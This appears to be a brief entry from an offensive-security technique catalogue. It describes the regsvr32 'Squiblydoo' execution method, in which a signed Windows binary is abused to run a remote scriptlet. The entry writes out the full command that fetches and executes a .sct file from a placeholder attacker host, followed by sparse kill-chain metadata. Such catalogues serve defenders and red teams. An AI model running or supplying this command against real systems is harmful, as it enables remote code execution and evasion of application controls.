Skip to content
← LibraryTechnique entry
LOL-REGSVR32Execution

regsvr32.exe /i Scriptlet (Squiblydoo)

regsvr32 /s /n /u /i:http://attacker/file.sct scrobj.dll — remote SCT execution via signed registrar.

§ Where this technique fits

LOL-REGSVR32 is catalogued under the Execution tactic of the offensive-security kill-chain. It appears in 1 approved dossier in the registry, typically at step 3 on average.

§ Dossiers chaining this technique

§ What commonly comes next

  1. 01seen 1×